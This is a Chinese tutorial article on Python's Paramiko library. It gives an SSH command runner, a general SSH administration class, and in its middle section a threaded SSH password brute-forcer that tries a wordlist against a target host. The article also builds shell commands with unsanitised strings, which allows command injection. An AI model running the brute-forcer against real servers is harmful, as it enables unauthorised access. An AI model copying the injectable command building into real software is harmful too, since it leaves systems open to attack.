Python使用Paramiko库实现SSH管理详解
作者:微软技术分享
paramiko 是一个用于在Python中实现SSHv2协议的库,它支持对远程服务器进行加密的通信,本文主要介绍了如何使用Paramiko库实现SSH管理,感兴趣的小伙伴可以学习一下
paramiko 是一个用于在Python中实现SSHv2协议的库,它支持对远程服务器进行加密的通信。目前该模块支持所有平台架构且自身遵循SSH2协议,支持以加密和认证的方式,进行远程服务器的连接,你可以在Python中实现SSH客户端和服务器,并进行安全的文件传输和远程命令执行。
主要特点:
- SSH 支持:
paramiko
提供了对 SSHv2 协议的完整支持,可以用于安全地连接和通信到远程服务器。 - SSH 客户端和服务端实现:
paramiko
不仅可以用作 SSH 客户端,还可以在 Python 中实现 SSH 服务器。这意味着你可以使用paramiko
来创建自己的 SSH 服务器,或者编写客户端与远程服务器进行通信。 - SFTP 文件传输:
paramiko
包含了对 SFTP(SSH 文件传输协议)的实现,可以在安全通道上传输文件,支持上传和下载文件。 - 支持密钥认证: 除了用户名和密码认证外,
paramiko
还支持使用密钥进行认证,包括支持 RSA 和 DSA 密钥。 - 多种认证方法: 支持多种认证方法,包括密码认证、密钥认证、GSS-API 认证等。
- 高级特性: 提供了一些高级特性,如端口转发(port forwarding)、代理支持等,使其适用于更复杂的网络场景。
- 跨平台:
paramiko
可以在多个平台上运行,包括 Linux、Windows 和 macOS。 - 易用性: 提供了简单而易用的 API,使得在 Python 中进行 SSH 连接、文件传输等操作变得容易。
- 活跃的社区支持:
paramiko
是一个开源项目,拥有活跃的社区支持。这意味着你可以在社区中找到文档、示例代码和得到技术支持。
实现简单SSH连接
import paramiko,threading import argparse class MyThread(threading.Thread): def __init__(self,address,username,password,port,command): super(MyThread, self).__init__() self.address = address self.username = username self.password = password self.port = port self.command = command def run(self): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(self.address, port=self.port, username=self.username, password=self.password, timeout=1) stdin, stdout, stderr = ssh.exec_command(self.command) result = stdout.read() if not result: self.result = stderr.read() ssh.close() self.result = result.decode() except Exception: self.result = "0" def get_result(self): try: return self.result except Exception: return "0" if __name__ == "__main__": # 使用方式: main.py -a 192.168.1.1 -u root -p 123123 -c ifconfig parser = argparse.ArgumentParser() parser.add_argument("-a",dest="addr",help="指定一个IP地址") parser.add_argument("-u",dest="user",help="指定目标主机用户名") parser.add_argument("-p",dest="passwd",help="指定目标主机密码") parser.add_argument("-c",dest="command",help="指定需要执行的命令") args = parser.parse_args() if args.addr and args.user and args.passwd and args.command: obj = MyThread(str(args.addr),str(args.user),str(args.passwd),"22",str(args.command)) obj.start() obj.join() ret = obj.get_result() if ret != "0": print(ret) else: parser.print_help()
实现SSH批量尝试
import pexpect import os,sys,time import threading import argparse def SSHConnect(Host,User,Password,Port,Command): try: child = pexpect.spawn('ssh -l %s %s -p %s %s' %(User,Host,Port,Command),timeout=1) ret = child.expect([pexpect.TIMEOUT, 'Are you sure you want to continue connecting','[Pp]assword:',r"([^-]>|#)"]) if ret == 0: # 连接超时 child.close() return 0 elif ret == 1: # SSH提示你是否确认连接 child.sendline ('yes') # 我们输入yes child.expect ('password: ')# 输入yes后应该提示输入密码,我们再次期待 password ret = child.expect([pexpect.TIMEOUT, 'password: ']) if ret == 0: # 连接超时 child.close() return 0 ret = child.sendline(Password) if ret == 5: #child.expect(pexpect.EOF) #return child.before return 1 child.close() return 0 except Exception: child.close() return 0 def ThreadBlast(Host,User,Password,Port,semaphore): semaphore.acquire() # 加锁 global number,PassCount RetCode = SSHConnect(Host,User,Password,Port,"pwd") if RetCode == 1: print("[*] 索引: {}/{} --> 密码: {}".format(str(number),str(PassCount),Password)) else: print("[-] 索引: {}/{} --> 尝试: {}".format(str(number),str(PassCount),Password)) number = number + 1 semaphore.release() # 释放锁 if __name__ == "__main__": # 使用方式: main.py -H 192.168.1.10 -u root -p 22 -f burp.log parser = argparse.ArgumentParser() parser.add_argument("-H","--host",dest="host",help="输入一个被攻击主机IP地址") parser.add_argument("-u","--user",dest="user",help="输入主机的用户账号,root") parser.add_argument("-p","--port",dest="port",help="输入SSH的端口号,22") parser.add_argument("-f","--file",dest="file",help="设置密码字典 wordlist.log") args = parser.parse_args() if args.host and args.user and args.port and args.file: number = 0 semaphore = threading.Semaphore(4) fp = open(args.file,"r") PassList = fp.readlines() PassCount = len(PassList) for item in PassList: t = threading.Thread(target=ThreadBlast,args=(args.host,args.user,str(item.replace("\n","")),args.port,semaphore)) t.start() else: parser.print_help()
封装MySSH通用类
import paramiko, math class MySSH: def __init__(self, address, username, password, default_port): self.address = address self.default_port = default_port self.username = username self.password = password # 初始化SSH接口 def Init(self): try: self.ssh_obj = paramiko.SSHClient() self.ssh_obj.set_missing_host_key_policy(paramiko.AutoAddPolicy()) self.ssh_obj.connect(self.address, self.default_port, self.username, self.password, timeout=3, allow_agent=False, look_for_keys=False) self.sftp_obj = self.ssh_obj.open_sftp() return True except Exception: return False return False # 执行命令并返回执行结果 def BatchCMD(self, command): try: stdin, stdout, stderr = self.ssh_obj.exec_command(command, timeout=3) result = stdout.read() if len(result) != 0: result = str(result).replace("\\n", "\n") result = result.replace("b'", "").replace("'", "") return result else: return None except Exception: return None # 执行非交互命令 只返回执行状态 ,或真或假 def BatchCMD_NotRef(self, command): try: stdin, stdout, stderr = self.ssh_obj.exec_command(command, timeout=3) result = stdout.read() if len(result) != 0: return True else: return None except Exception: return False # 将远程文件下载到本地 def GetRemoteFile(self, remote_path, local_path): try: self.sftp_obj.get(remote_path, local_path) return True except Exception: return False # 将本地文件上传到远程 def PutLocalFile(self, localpath, remotepath): try: self.sftp_obj.put(localpath, remotepath) return True except Exception: return False # 获取文件大小 def GetFileSize(self, file_path): ref = self.BatchCMD("du -s " + file_path + " | awk '{print $1}'") return ref.replace("\n", "") # 判断文件是否存在 def IsFile(self, file_path): return self.BatchCMD("[ -e {} ] && echo 'True' || echo 'False'".format(file_path)) # 获取系统型号 def GetSystemVersion(self): return self.BatchCMD("uname") # 关闭SSH接口 def CloseSSH(self): try: self.sftp_obj.close() self.ssh_obj.close() except Exception: pass # 测试主机连通率 def GetPing(self): try: if self.GetSystemVersion() != None: print("{} 已连通.".format(self.address)) return True else: return False except Exception: return False # 获取文件列表,并得到大小 def GetFileList(self, path): try: ref_list = [] self.sftp_obj.chdir(path) file_list = self.sftp_obj.listdir("./") for sub_path in file_list: dict = {} file_size = self.GetFileSize(path + sub_path) dict[path + sub_path] = file_size ref_list.append(dict) return ref_list except Exception: return False # 将远程文件全部打包后拉取到本地 def GetTarPackageAll(self, path): try: file_list = self.sftp_obj.listdir(path) self.sftp_obj.chdir(path) for packageName in file_list: self.ssh_obj.exec_command("tar -czf /tmp/{0}.tar.gz {0}".format(packageName)) self.sftp_obj.get("/tmp/{}.tar.gz".format(packageName), "./file/{}.tar.gz".format(packageName)) self.sftp_obj.remove("/tmp/{}.tar.gz".format(packageName)) return True except Exception: return True # 获取磁盘空间并返回字典 def GetAllDiskSpace(self): ref_dict = {} cmd_dict = {"Linux\n": "df | grep -v 'Filesystem' | awk '{print $5 \":\" $6}'", "AIX\n": "df | grep -v 'Filesystem' | awk '{print $4 \":\" $7}'" } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): # 根据不同版本选择不同的命令 os_ref = self.BatchCMD(run_cmd) ref_list = os_ref.split("\n") # 循环将其转换为字典 for each in ref_list: # 判断最后是否为空,过滤最后一项 if each != "": ref_dict[str(each.split(":")[1])] = str(each.split(":")[0]) return ref_dict except Exception: return False # 拉取内存数据到本地。 def GetAllMemSpace(self): cmd_dict = {"Linux\n": "cat /proc/meminfo | head -n 2 | awk '{print $2}' | xargs | awk '{print $1 \":\" $2}'", "AIX\n": "svmon -G | grep -v 'virtual' | head -n 1 | awk '{print $2 \":\" $4}'" } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) mem_total = math.ceil(int(os_ref.split(":")[0].replace("\n", "")) / 1024) mem_free = math.ceil(int(os_ref.split(":")[1].replace("\n", "")) / 1024) percentage = 100 - int(mem_free / int(mem_total / 100)) print("利用百分比: {} \t 总内存: {} \t 剩余内存: {}".format(percentage,mem_total,mem_free)) return str(percentage) + " %" except Exception: return False # 获取CPU利用率数据 def GetCPUPercentage(self): ref_dict = {} cmd_dict = {"Linux\n": "vmstat | tail -n 1 | awk '{print $13 \":\" $14 \":\" $15}'", "AIX\n": "vmstat | tail -n 1 | awk '{print $14 \":\" $15 \":\" $16}'" } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) ref_list = os_ref.split("\n") for each in ref_list: if each != "": each = each.split(":") ref_dict = {"us": each[0], "sys": each[1], "idea": each[2]} print("CPU利用率数据: {}".format(ref_dict)) return ref_dict except Exception: return False # 获取到系统负载利用率 也就是一分钟负载五分钟负载十五分钟负载 def GetLoadAVG(self): ref_dict = {} cmd_dict = {"Linux\n": "cat /proc/loadavg | awk '{print $1 \":\" $2 \":\" $3}'", "AIX\n": "uptime | awk '{print $10 \":\" $11 \":\" $12}'" } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) ref_list = os_ref.split("\n") for each in ref_list: if each != "": each = each.replace(",","").split(":") ref_dict = {"1avg": each[0],"5avg": each[1],"15avg": each[2]} print("负载利用率: {}".format(ref_dict)) return ref_dict return False except Exception: return False # 获取系统进程信息,并返回字典格式 def GetAllProcessSpace(self): ref_dict = {} cmd_dict = {"Linux\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $11}' | uniq", "AIX\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $12}' | uniq" } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) ref_list = os_ref.split("\n") for each in ref_list: if each != "": ref_dict[str(each.split(":")[0])] = str(each.split(":")[1]) return ref_dict except Exception: return False # 检测指定进程是否存活 def CheckProcessStatus(self,processname): cmd_dict = {"Linux\n": "ps aux | grep '{0}' | grep -v 'grep' | awk {1} | wc -l".format(processname,"{'print $2'}"), "AIX\n": "ps aux | grep '{0}' | grep -v 'grep' | awk {1} | wc -l".format(processname,"{'print $2'}") } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) ret_flag = str(os_ref.split("\n")[0].replace(" ","").strip()) if ret_flag != "0": return True return False except Exception: return "None" # 判断指定进程名是否存在,如果存在返回进程 {PID:0,CPU:0,MEM:0} def CheckProcessName(self,ProcName): cmd_dict = {"Linux\n": "ps aux | grep '" + ProcName + "' | grep -v 'grep' | awk {'print $2 \":\" $3 \":\" $4'} | head -1", "AIX\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $12}' | uniq" } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) ref_list = os_ref.replace("\n","").split(":") ref_dict = {"PID": ref_list[0], "CPU": ref_list[1], "Mem": ref_list[2]} return ref_dict except Exception: return False return False # 检测指定端口是否存活 def CheckPortStatus(self,port): cmd_dict = {"Linux\n": "netstat -antp | grep {0} | awk {1}".format(port,"{'print $6'}") , "AIX\n": "netstat -ant | grep {0} | head -n 1 | awk {1}".format(port,"{'print $6'}") } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) ret_flag = str(os_ref.split("\n")[0].replace(" ","").strip()) if ret_flag == "LISTEN" or ret_flag == "ESTABLISHED": return True return False except Exception: return False # 修改当前用户密码 def SetPasswd(self,username,password): try: os_id = self.BatchCMD("id | awk {'print $1'}") print(os_id) if(os_id == "uid=0(root)\n"): self.BatchCMD("echo '{}' | passwd --stdin '{}' > /dev/null".format(password,username)) return True except Exception: return False if __name__ == "__main__": ssh = MySSH("132.35.69.71","root","123456789",22) if ssh.Init() == True: ref = ssh.GetAllDiskSpace() print(ref)
以上就是Python使用Paramiko库实现SSH管理详解的详细内容,更多关于Python Paramiko实现SSH管理的资料请关注脚本之家其它相关文章!